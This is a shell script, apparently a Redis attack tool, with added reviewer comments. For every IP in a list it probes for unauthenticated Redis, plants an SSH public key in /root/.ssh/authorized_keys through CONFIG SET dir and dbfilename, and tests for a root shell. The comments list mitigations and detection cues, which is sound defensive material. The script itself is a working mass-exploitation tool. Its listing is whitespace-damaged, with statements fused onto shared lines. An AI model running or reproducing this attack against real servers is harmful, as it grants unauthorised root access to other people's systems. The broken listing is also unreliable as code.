redis安全
#!/bin/shif [ $# -eq 1]
# NOTE(review): the listing is whitespace-damaged as published (the shebang and
# the first `if` share a line, and several statements are fused onto one line).
# The code is kept byte-for-byte; only comments are added.
#
# Purpose, as far as the visible commands show: takes one argument, a file with
# one host address per line, and for every host checks whether Redis accepts an
# unauthenticated `CONFIG SET dir /root/.ssh/`. Where it does, the script stores
# an SSH public key in Redis, points the dump file at
# /root/.ssh/authorized_keys, and then tests an SSH login as root. Hosts are
# sorted into noauth.txt, runasroot.txt, rootshell.txt and haveauth.txt.
#
# Defensive reading: the chain needs all of the following on the server side,
# and removing any one of them stops it:
#   1. the Redis port is reachable from an untrusted network
#      (mitigate: bind to loopback/private interface, protected-mode, firewall);
#   2. commands are accepted without authentication
#      (mitigate: requirepass or ACL users);
#   3. the client may change `dir` and `dbfilename` at runtime
#      (mitigate: deny CONFIG via ACL or rename-command; Redis 7.0+ refuses
#      changes to these two settings unless enable-protected-configs allows it);
#   4. the redis-server process can write into /root/.ssh
#      (mitigate: run Redis as a dedicated unprivileged user);
#   5. sshd accepts key-based root logins
#      (mitigate: PermitRootLogin no).
then ip_list=$1
##create id_rsa
echo "****************************************Create id_rsa file"
# Creates an RSA key pair named id_rsa in the current directory. The expect
# script answers both passphrase prompts with an empty line and answers "n" to
# the y/n prompt (ssh-keygen's overwrite question when id_rsa already exists).
expect -c "
spawn ssh-keygen -t rsa -f id_rsa -C \"yyf\"
expect { \"*passphrase): \" {
exp_send \"\r\"
exp_continue
} \"*again: \" {
exp_send \"\r\"
} \"*y/n)? \" {
exp_send \"n\r\"
}
}
expect eof
"
echo "\n\n****************************************Attack Targets"
# Result files, one address per line, appended to inside the loop below.
touch noauth.txt runasroot.txt rootshell.txt haveauth.txt i=0
cat $ip_list | while read ip do i=`expr $i + 1`; #write id_rsa.pub to remote
echo "*****${i}***connect to remote ${ip} redis "
# Probe step. The exit status of this expect script encodes the server's reply
# to CONFIG SET dir /root/.ssh/ :
#   0 = "OK", 1 = permission denied, 2 = no matching reply within 3 seconds,
#   3 = NOAUTH (the server demands authentication).
# Detection: a CONFIG SET dir or CONFIG SET dbfilename issued by a remote
# client is rarely legitimate and is worth alerting on.
expect -c "
set timeout 3
spawn redis-cli -h $ip config set dir /root/.ssh/
expect { \"OK\" { exit 0 } \"ERR Changing directory: Permission denied\" { exit 1 }
timeout { exit 2 } \"(error) NOAUTH Authentication required\" { exit 3 }
}
"
# Classify the host from the probe's exit status. Only status 0 falls through
# to the key-writing steps; 1, 2 and 3 skip to the next host with `continue`.
case $? in 0)echo "run redis as root"
echo $ip >> noauth.txt echo $ip >> runasroot.txt
;;
1)echo "not run redis as root\n\n\n"
echo $ip >> noauth.txt continue
;;
2)echo "connect timeout\n\n\n"
continue
;;
3)echo "Have Auth\n\n\n"
echo $ip >> haveauth.txt continue
;; esac
# The public key is wrapped in blank lines and stored as the value of key "1";
# presumably the padding keeps the key on a line of its own inside the binary
# dump file so that sshd can still parse it (confirm against sshd behaviour).
# Detection: an authorized_keys file that starts with the RDB magic "REDIS",
# or that was last written by the redis-server process, is a strong indicator;
# file-integrity or audit rules on /root/.ssh catch the write itself.
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
cat foo.txt | redis-cli -h $ip -x set 1
redis-cli -h $ip config set dir /root/.ssh/
redis-cli -h $ip config set dbfilename "authorized_keys"
redis-cli save #login test
echo "#try to login"
# Login test with the generated private key. Exit status of the expect script:
#   0 = the remote command echoed "yyf" (key login as root worked),
#   1 = a password prompt appeared (key not accepted; Ctrl-C is sent),
#   2 = timeout after 5 seconds, 4 = anything else.
# A host-key confirmation prompt is answered with "yes".
expect -c "
set timeout 5
spawn ssh -i id_rsa root@$ip echo \"yyf\"
expect { \"*yes/no\" { send \"yes\n\"} \"*password\" { send \"\003\"; exit 1 } \"yyf\" { exit 0 }
timeout { exit 2 }
}
exit 4
"
exitcode=$?
if [ $exitcode -eq 0 ]
then echo "---------------${ip} is get root shell"
echo $ip >> rootshell.txt fi echo "\n\n\n"
# Summary: line counts of the input list and of each result file.
done echo "##########Final Count##########"
wc -l $ip_list
echo "----------"
wc -l noauth.txt
wc -l runasroot.txt
wc -l rootshell.txt echo "----------"
wc -l haveauth.txt else echo "usage: ./redis.sh ip.txt"
fi